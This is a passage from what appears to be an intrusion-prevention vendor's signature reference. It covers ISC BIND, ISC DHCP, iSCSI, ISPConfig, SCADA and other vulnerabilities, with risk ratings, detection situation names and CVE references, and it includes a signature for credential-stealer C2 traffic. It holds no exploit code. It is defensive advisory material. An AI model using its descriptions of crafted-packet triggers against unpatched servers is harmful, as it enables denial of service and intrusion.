https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4620
BID-75588
http://www.securityfocus.com/bid/75588
Back to top

ISC-BIND-DNSSEC-Validation-Multiple-RRsets-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Malfunction
Description: A denial of service vulnerability exists in ISC BIND, the DNS server implementation by Internet Systems Consortium. The vulnerability is due to an assertion failure when validating DNS response that contains multiple Resource Record sets. The vulnerability could be exploited by a remote attacker to cause a denial of service condition of the DNS server. In an attack case where the attacker is successful, the vulnerable named process will terminate and exit, creating a denial of service condition. The service needs to be restarted manually to restore the functionality. Users that rely on the affected server to resolve domain names will be unable to use most of Internet based applications.
Situation: DNS-UDP_ISC-BIND-DNSSEC-Validation-Multiple-RRsets-Denial-Of-Service
References:
CVE-2007-0494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0494
BID-22231
http://www.securityfocus.com/bid/22231
Back to top

ISC-BIND-Dynamic-Update-Request-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in ISC BIND 9
Risk: High
First detected in: sgpkg-ips-236-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: BIND
Type: Malfunction
Description: There is a denial of service vulnerability in ISC BIND 9. By sending a crafted dynamic update request to the vulnerable DNS server, a remote unauthenticated attacker can terminate the DNS server process.
Situation: DNS-TCP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service
DNS-UDP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service
DNS-UDP_ISC-BIND-Dynamic-Update-Request-Denial-Of-Service-Exploit
References:
CVE-2009-0696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0696
BID-35848
http://www.securityfocus.com/bid/35848
OSVDB-56584
http://www.osvdb.org/56584
Back to top

ISC-Bind-Edns-Option-Processing-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Malfunction
Description: A denial of service vulnerability exists in ISC BIND. The vulnerability is caused by an assertion failure when processing the EDNS option. A remote attacker may exploit this vulnerability by sending a specially crafted query to the affected servers. Successful exploitation would result in the BIND service terminating unexpectedly.
Situation: DNS-UDP_ISC-Bind-Edns-Option-Processing-Denial-Of-Service
References:
CVE-2014-3859
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3859
BID-68038
http://www.securityfocus.com/bid/68038
OSVDB-107999
http://www.osvdb.org/107999
Back to top

ISC-BIND-Invalid-DNS-Key-Record

About this vulnerability: An invalid KEY resource record in a DNS message was detected
Risk: Moderate
First detected in: sgpkg-ips-1315-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: BIND9 may assert when processing an invalid KEY or DNSKEY resource record with a modulus of all zeros. It may use uninitialized memory if the modulus length is zero.
Situation: DNS_ISC-BIND-Empty-RSA-Modulus
References:
CVE-2020-8623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8623
Back to top

ISC-Bind-Lwresd-Query-Name-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: Improper length field check in the BIND DNS server results in a denial of service vulnerability.
Situation: Generic_UDP-ISC-Bind-Lwresd-Query-Name-Denial-Of-Service
DNS-UDP_ISC-Bind-Lwresd-Query-Name-Denial-Of-Service
References:
CVE-2016-2775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2775
Back to top

Isc-Bind-Openpgpkey61c-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Critical
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: There is a denial-of-service vulnerability in ISC BIND. A crafted packet with invalid OpenPGP request length may create a denial of service condition in vulnerable servers.
Situation: DNS-TCP_Isc-Bind-Openpgpkey61c-Denial-Of-Service
DNS-UDP_Isc-Bind-Openpgpkey61c-Denial-Of-Service
References:
CVE-2015-5986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5986
Back to top

ISC-Bind-Query-Response-Missing-RRSIG-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-857-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: A denial of service condition can be caused in ISC BIND by using a crafted response packet with a missin RRSIG record.
Situation: DNS-UDP_ISC-Bind-Query-Response-Missing-RRSIG-Denial-Of-Service
References:
CVE-2016-9444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9444
Back to top

ISC-BIND-Query_addsoa-Denial-Of-Service

About this vulnerability: A vulnerability in Internet Systems Consortium (ISC) BIND
Risk: High
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Malfunction
Description: A denial of service vulnerability exists in ISC BIND, the DNS server implementation by Internet Systems Consortium. The vulnerability is due a failure to handle a certain sequence of recursive DNS queries. Remote attackers can exploit this vulnerability by sending a specially crafted sequence of queries and cause a denial of service condition in the DNS server. In an attack case where the attacker is successful, the vulnerable named process will terminate and exit, creating a denial of service condition. The service needs to be restarted manually to restore the functionality. Users that rely on the affected server to resolve domain names will be unable to use most of Internet based applications.
Situation: DNS-UDP_ISC-BIND-Query_addsoa-Denial-Of-Service
References:
CVE-2007-2241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2241
BID-23738
http://www.securityfocus.com/bid/23738
OSVDB-34748
http://www.osvdb.org/34748
Back to top

ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Input Validation
Description: There is a denial of service vulnerability in ISC BIND. The vulnerability is due to an assertion failure that occurs when handling malformed RDATA. A remote attacker could exploit this vulnerability by sending a DNS query response with a specially crafted resource record to an affected server. Successful exploitation would result in the BIND service terminating unexpectedly.
Situation: DNS-TCP_ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service
DNS-UDP_ISC-Bind-Rdata-Handling-Assertion-Failure-Denial-Of-Service
References:
CVE-2013-4854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4854
BID-61479
http://www.securityfocus.com/bid/61479
OSVDB-95707
http://www.osvdb.org/95707
Back to top

Isc-Bind-Recursive-Resolver-Resource-Consumption-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: High
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Malfunction
Description: A denial of service vulnerability exists in ISC BIND. The vulnerability is due to a design weakness in the way BIND follows DNS delegations. A remote attacker can exploit these vulnerabilities by sending a request to a recursive resolver forcing the resolver to issue a large number (possibly infinite) of queries. A successful attack could lead to resource exhaustion resulting in a denial of service condition.
Situation: Analyzer_ISC-Bind-Denial-of-Service
DNS-UDP_Isc-Authoritative-Resource-Record
References:
CVE-2014-8500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8500
BID-71590
http://www.securityfocus.com/bid/71590
OSVDB-115524
http://www.osvdb.org/115524
Back to top

Isc-Bind-Regular-Expression-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Resource Starvation
Description: A denial of service vulnerability exists in ISC BIND. The vulnerability is caused by the way BIND processes certain record types containing regular expressions. A remote attacker may exploit this vulnerability using one of several attack vectors to get the vulnerable BIND server to process a malicious DNS record. A successful attack can lead to excessive memory consumption of the BIND process, eventually leading to a denial-of-service condition.
Situation: DNS-TCP_Isc-Bind-Regular-Expression-Handling-Denial-Of-Service
DNS-UDP_Isc-Bind-Regular-Expression-Handling-Denial-Of-Service
References:
CVE-2013-2266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2266
OSVDB-91712
http://www.osvdb.org/91712
Back to top

ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: The RNDC control message interface in BIND has an input validation vulnerability, which can allow an attacker to get code execution access on the target system.
Situation: Generic_CS-ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service
References:
CVE-2016-1285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1285
Back to top

ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service-CVE-2017-3138

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Malfunction
Description: Improper handling of control commands sent to the RNDC interface of ISC BIND causes an assertion failure, which can be triggered by a remote unauthenticated attacker. A successful exploit can cause a denial of service condition on the target system.
Situation: Generic_CS-ISC-Bind-Rndc-Control-Channel-Assertion-Failure-DoS
References:
CVE-2017-3138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3138
Back to top

Isc-Bind-RPZ-Query-Processing-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-958-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in ISC BIND. An attacker can make a vulnerable target system to go into an infinite loop with multiple crafted packets causing a denial of service condition.
Situation: DNS-TCP_Empty-TTL-In-Reply
DNS-UDP_Empty-TTL-In-Reply
DNS-UDP_ISC-BIND-Denial-Of-Service-CVE-2017-3140
References:
CVE-2017-3140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3140
Back to top

ISC-Bind-RRSIG-Record-Response-Assertion-Failure-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-851-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: A denial of service condition can be caused by sending a crafted response to ISC BIND to trigger an assertion failure.
Situation: DNS-UDP_ISC-Bind-RRSIG-Record-Response-Assertion-Failure-Denial-Of-Service
References:
CVE-2016-9147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9147
Back to top

ISC-BIND-RRSIG-RRsets-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Malfunction
Description: A denial of service vulnerability has been reported in ISC BIND. The vulnerability is caused by an off-by-one error which further leads to an assertion failure when processing very large RRSIG RRsets in a negative response. An remote attacker may exploit this vulnerability through querying a targeted caching resolver for non-existent names in the domain served by the attacker controlled server.
Situation: DNS-TCP_ISC-BIND-RRSIG-RRsets-Denial-Of-Service
References:
CVE-2011-1910
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1910
BID-48007
http://www.securityfocus.com/bid/48007
OSVDB-72540
http://www.osvdb.org/72540
Back to top

ISC-BIND-TCP-Receive-Buffer-Length-Assertion-DoS

About this vulnerability: A vulnerability in ISC BIND.
Risk: High
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Platform: Generic
Software: ISC BIND
Type: Malfunction
Description: A vulnerability in ISC BIND, versions 9.15.6 -> 9.16.5 and 9.17.0 -> 9.17.3, which allows remote attackers to cause a denial of service condition by sending crafted messages to a vulnerable BIND server, due to an incorrectly specified maximum buffer size for handling TCP payload.
Situation: DNS-TCP_ISC-BIND-TCP-Receive-Buffer-Length-Assertion-DoS
References:
CVE-2020-8620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8620
Back to top

ISC-BIND-TKEY-Queries-Input-Validation-DoS

About this vulnerability: A vulnerability in ISC BIND
Risk: High
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Input Validation
Description: An unauthenticated remote attacker can send a crafted packet to trigger a REQUIRE assertion failure, causing BIND to exit. Successful attack results in a denial of service condition
Situation: DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS
DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-2
DNS-TCP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-3
DNS-UDP_ISC-BIND-TKEY-Queries-Input-Validation-DoS
DNS-UDP_ISC-BIND-TKEY-Queries-Input-Validation-DoS-2
DNS-UDP_BIND-TKEY-Queries-Input-Validation-DoS-3
References:
CVE-2015-5477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477
Back to top

ISC-BIND-TKEY-SPNEGO-der_Get_Oid-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Platform: Generic
Software: ISC BIND
Type: Malfunction
Description: Improper input validation in and around the der_get_oid() function within the SPNEGO component of BIND causes an out of bounds write vulnerability which, when successfully exploited, allows an attacker to cause a denial of service condition or possiby execute code on the target system.
Situation: DNS-TCP_ISC-BIND-TKEY-SPNEGO-der_Get_Oid-Out-Of-Bounds-Write
References:
CVE-2020-8625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8625
Back to top

ISC-BIND-Truncated-Tsig-Record

About this vulnerability: A truncated Tsig resource record in a DNS message was detected
Risk: Moderate
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1314-5242
Platform: Generic
Software: ISC BIND
Type: Input Validation
Description: BIND9 may assert when processing a truncated Tsig resource record.
Situation: DNS-UDP_ISC-Bind-Tsig-Truncation-Denial-Of-Service-1
DNS-UDP_ISC-Bind-Tsig-Truncation-Denial-Of-Service-2
References:
CVE-2020-8622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8622
Back to top

ISC-Bind-Tsig-Validation-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC BIND
Type: Malfunction
Description: Improper handling of TSIG resource records causes a denial of service vulnerability in ISC BIND.
Situation: DNS-UDP_ISC-Bind-Tsig-Validation-Denial-Of-Service
References:
CVE-2020-8617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8617
Back to top

ISC-BIND-Zero-Length-Rdata-Denial-Of-Service

About this vulnerability: A vulnerability in ISC BIND
Risk: Moderate
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: BIND
Type: Input Validation
Description: There is a denial of service vulnerabilit in ISC BIND. The vulnerability is due to a improper handling of zero-length rdata in unknown record types. In the case of a successful attack the affected server will crash, causing a denial-of-service condition.
Situation: DNS-TCP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service
DNS-TCP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service-2
DNS-UDP_ISC-BIND-Zero-Length-Rdata-Denial-Of-Service
References:
CVE-2012-1667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1667
BID-53772
http://www.securityfocus.com/bid/53772
OSVDB-82609
http://www.osvdb.org/82609
Back to top

ISC-DHCP-Buffer-Overflow

About this vulnerability: An ISC DHCP Buffer Overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC DHCP Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability in ISC DHCP Server which allows remote attackers to cause a denial of service condition or execute remote code due to a memory access violation when the memory buffer used to hold the log messages is overflowed.
Situation: BOOTP_CS-ISC-DHCP-Buffer-Overflow
References:
CVE-2004-0460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0460
Back to top

ISC-DHCP-dhclient-Pretty_Print_Option-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in ISC DHCP dhclient
Risk: Moderate
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC DHCP dhclient
Type: Buffer Overflow
Description: Improper handling of DHCP options causes a stack buffer overflow in the ISC DHCP client. A successful exploit can allow an attacker to execute arbitrary code on the target system.
Situation: Generic_UDP-ISC-DHCP-dhclient-Pretty_Print_Option-Stack-Buffer-Overflow
References:
CVE-2018-5732
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5732
Back to top

ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service

About this vulnerability: A vulnerability in Internet Software Consortium DHCP
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC DHCP Server
Type: Input Validation
Description: There is a denial of service vulnerability in the ISC DHCP server product. The flaw exists due to incorrectly verification on client supplied data in DHCP communication. An attacker may exploit this vulnerability to stop the DHCP service on the target host. Upon processing of a crafted message, the vulnerable DHCP server will shut down thereby creating a denial of service condition. All subsequent connections to the server will not be possible. This will result in the inability of hosts on the affected local network to receive IP addresses during lease renewals.
Situation: BOOTP_CS-ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service
BOOTP_CS-ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service-2
References:
CVE-2006-3122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3122
BID-19348
http://www.securityfocus.com/bid/19348
Back to top

ISC-DHCP-Server-Dhcpv6-Null-Pointer-Dereference

About this vulnerability: An ISC DHCP Server DHCPv6 NULL-Pointer Dereference vulnerability
Risk: High
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC DHCP Server
Type: Null Pointer Dereference
Description: A vulnerability in ISC DHCP Server which allows remote attackers to cause a denial of service condition by sending malicious packets to the target server due to a NULL pointer dereference in the handling of a DHCPv6 lease structure.
Situation: Generic_UDP-ISC-DHCP-Server-Dhcpv6-Null-Pointer-Dereference
References:
CVE-2011-4868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4868
Back to top

ISC-DHCP-Server-Duid-Handling-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in ISC DHCP Server
Risk: Moderate
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC DHCP Server
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in ISC DHCP Server. The vulnerability is caused by a lack of bounds checking when parsing the client DUID (DHCP unique identifier). Successful exploitation would result in execution of arbitrary code in the context of the affected service, normally unprivileged. However, since most modern UNIX and Linux systems enable stack protection techniques and address space randomization, the most likely exploitation impact is the termination of the affected service causing a denial-of-service condition.
Situation: Generic_UDP-ISC-DHCP-Server-Duid-Handling-Stack-Buffer-Overflow
References:
CVE-2012-3570
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3570
OSVDB-84252
http://www.osvdb.org/84252
Back to top

ISC-DHCP-Server-Omapi-Denial-Of-Service

About this vulnerability: A vulnerability in ISC DHCP Server
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC DHCP Server
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in ISC DHCP Server. This vulnerability is due to improper clean up of closed OMAPI connections. A remote attacker can exploit this vulnerability by initiating many OMAPI connections with a vulnerable server. Successful exploitation results in denial-of-service conditions on the server's OMAPI interface.
Situation: Analyzer_ISC-DHCP-Server-OMAPI-Denial-Of-Service
Generic_TCP-ISC-DHCP-Server-Omapi-Denial-Of-Service
References:
CVE-2017-3144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3144
Back to top

Isc-DHCP-Server-Packet-Processing-Denial-Of-Service

About this vulnerability: A vulnerability in ISC DHCP Server
Risk: High
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC DHCP Server
Type: Malfunction
Description: A denial of service vulnerability exists in ISC DHCP Server. The vulnerability is caused by the processing of incomplete BOOTP packets. The processing of these malformed packets can lead to a denial of service condition. An unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted packet to a vulnerable system. This can result in the termination of the affected service causing a denial of service condition.
Situation: BOOTP_CS-Isc-DHCP-Server-Packet-Processing-Denial-Of-Service
References:
CVE-2011-2748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2748
BID-49120
http://www.securityfocus.com/bid/49120
Back to top

Isc-DHCP-Server-Zero-Length-Client-Id-Denial-Of-Service

About this vulnerability: A vulnerability in ISC DHCP Server
Risk: Moderate
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISC DHCP Server
Type: Malfunction
Description: A denial of server vulnerability has been reported in ISC DHCP server. The vulnerability is due to a design error while parsing request containing a zero length client identifier. Remote unauthenticated attackers could exploit this vulnerability by sending crafted packets to the target DHCP server. Successful exploitation of this vulnerability would terminate the DHCP server process and result in a denial of service condition.
Situation: BOOTP_CS-Isc-DHCP-Server-Zero-Length-Client-Id-Denial-Of-Service
References:
CVE-2010-2156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2156
BID-40775
http://www.securityfocus.com/bid/40775
Back to top

iSCSI-target-Multiple-Implementations-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in iSCSI target
Risk: High
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: iSCSI target
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in iSCSI target. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted SCN request to execute arbitrary code with the privileges of the root user.
Situation: Generic_CS-iSCSI-target-Multiple-Implementations-Buffer-Overflow
References:
CVE-2010-2221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2221
BID-41327
http://www.securityfocus.com/bid/41327
OSVDB-65992
http://www.osvdb.org/65992
OSVDB-65991
http://www.osvdb.org/65991
OSVDB-65990
http://www.osvdb.org/65990
Back to top

iSCSI-target-Multiple-Implementations-Format-String-Code-Execution

About this vulnerability: A vulnerability in iSCSI target
Risk: High
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: iSCSI target
Type: Format String
Description: A format string vulnerability exist in multiple implementations of iSCSI target.
Situation: Generic_CS-iSCSI-target-Multiple-Implementations-Format-String-Code-Execution
References:
CVE-2010-0743
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0743
BID-39127
http://www.securityfocus.com/bid/39127
Back to top

Iseemedia-LPViewer-ActiveX-Control-Multiple-Buffer-Overflows

About this vulnerability: Multiple buffer overflow vulnerabilities in iseemedia LPViewer
Risk: High
First detected in: sgpkg-ips-175-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: iseemedia LPViewer
Type: Buffer Overflow
Description: There are multiple buffer overflow vulnerabilities in the iseemedia LPViewer ActiveX Control. The vulnerabilities are due to insufficient boundary checking when a crafted parameter is passed to the affected ActiveX control. An attacker can exploit this vulnerability by enticing a target user to open a malicious web page. Successful exploitation can lead to injection and execution of arbitrary code in the security context of the currently logged in user.
Situation: HTTP_SS-Iseemedia-LPViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow
File-Text_Iseemedia-LPViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow
References:
CVE-2008-4384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4384
BID-31604
http://www.securityfocus.com/bid/31604
Back to top

ISO-MPEG-4-Media-Content

About this vulnerability: Download of ISO MPEG-4 media file
Risk: Low
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Any Software
Type: Insecure Configuration
Description: ISO MPEG-4 is a common media file format that carries video and audio content.
Situation: HTTP_SS-ISO-MPEG-4-Download
File-MPEG_ISO-MPEG-4-Download
Back to top

ISPConfig-Remote-Command-Execution

About this vulnerability: ISPConfig Remote Command Execution
Risk: Moderate
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISPConfig
Type: PHP Injection
Description: There is a remote command execution vulnerability in ISPConfig hosting control panel. An authenticated user can exploit this by executing arbitrary PHP code within the target system.
Situation: HTTP_CS-ISPConfig-Remote-Command-Execution
References:
CVE-2013-3629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3629
Back to top

ISPConfig-User_settings.php-Arbitrary-File-Inclusion

About this vulnerability: A vulnerability in ISPConfig
Risk: Moderate
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISPConfig
Type: Input Validation
Description: There has been reported an arbitrary file inclusion vulnerability in ISPConfig. A remote attacker can exploit this vulnerability by sending a crafted request to the target service. Successful exploitation can result in arbitrary code execution.
Situation: HTTP_CRL-ISPConfig-User_settings.php-Arbitrary-File-Inclusion
References:
CVE-2018-17984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17984
Back to top

ISR-Stealer-C2-Traffic

About this vulnerability: ISR Stealer traffic was detected
Risk: High
First detected in: sgpkg-ips-1054-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: ISR Stealer is a modified version of the ancient Hackhound infostealer. This stealer is used to steal different kind of credentials from the target system.
Situation: HTTP_CSH-ISR-Stealer-C2-Traffic
Back to top

ISS-PAM-ICQ-Parsing-BOF

About this vulnerability: Buffer overflow in ICQ protocol parsing module in the Internet Security Systems
Risk: High
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ISS BlackICE, Proventia A/G/M, RealSecure
Type: Buffer Overflow
Description: Internet Security Systems (ISS) Protocol Analysis Module (PAM) contains a remote buffer overflow vulnerability when parsing the ICQ protocol. This issue exists due to insufficient bounds checking when parsing certain protocol fields embedded within ICQ response data. Successful exploitation of this issue may allow a remote attacker to execute arbitrary code on a vulnerable system.
Situation: Generic_ISS-PAM-ICQ-BOF
Generic_ISS-PAM-ICQ-Parsing-BOF-1
Generic_ISS-PAM-ICQ-Parsing-BOF-2
Generic_ISS-PAM-ICQ-Parsing-BOF-Witty
Generic_ISS-PAM-ICQ-Parsing-BOF-3
Generic_ISS-PAM-ICQ-Parser-BOF
Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-1
Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-2
Generic_UDP-SS-ISS-PAM-ICQ-Parsing-BOF-3
References:
CVE-2004-0362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0362
BID-9913
http://www.securityfocus.com/bid/9913
OSVDB-4355
http://www.osvdb.org/4355
Back to top

ISTBar-Internet-Explorer-Toolbar

About this vulnerability: ISTBar Internet Explorer Toolbar
Risk: Low
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ISTBar Internet Explorer Toolbar
Type: Misconfiguration
Description: ISTBar is an Internet Explorer toolbar that may be considered unwanted software by many organizations. It may disclose browsing information and show advertisement popus.
Situation: HTTP_CSH-ISTBar-Activity
HTTP_CSH-ISTBar-Install
HTTP_CSH-ISTBar-Popup-Instructions-Download
Back to top

ITHouse-Mail-Server-RCPT-To-BOF

About this vulnerability: ITHouse Mail Server RCPT To Buffer Overflow system compromise
Risk: High
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows NT
Software: ITHouse mail server
Type: Buffer Overflow
Description: Buffer overflow in ITHouse mail server RCPT To argument processing allows remote attacker to execute arbitraty commands in the server.
Situation: SMTP_RCPT-To-BOF
References:
CVE-2000-0488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0488
BID-1285
http://www.securityfocus.com/bid/1285
Back to top

itok-Token-SQL-Injection

About this vulnerability: An itok Token SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-1027-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: A vulnerability in the itok Token parameter which allows remote attackers to gain sensitive information via an SQL injection.
Situation: HTTP_CRL-itok-Token-SQL-Injection
Back to top

ITS-SCADA-SQL-Injection

About this vulnerability: A vulnerability in ITS SCADA
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ITS SCADA
Type: SQL Injection
Description: There is an SQL injection vulnerability in ITS SCADA which may allow an unauthorized information disclosure.
Situation: HTTP_CRL-ITS-SCADA-SQL-Injection
References:
OSVDB-69872
http://www.osvdb.org/69872
Back to top

Ivanti-Avalanche-Certificate-Management-Server-Insecure-Deserialization

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
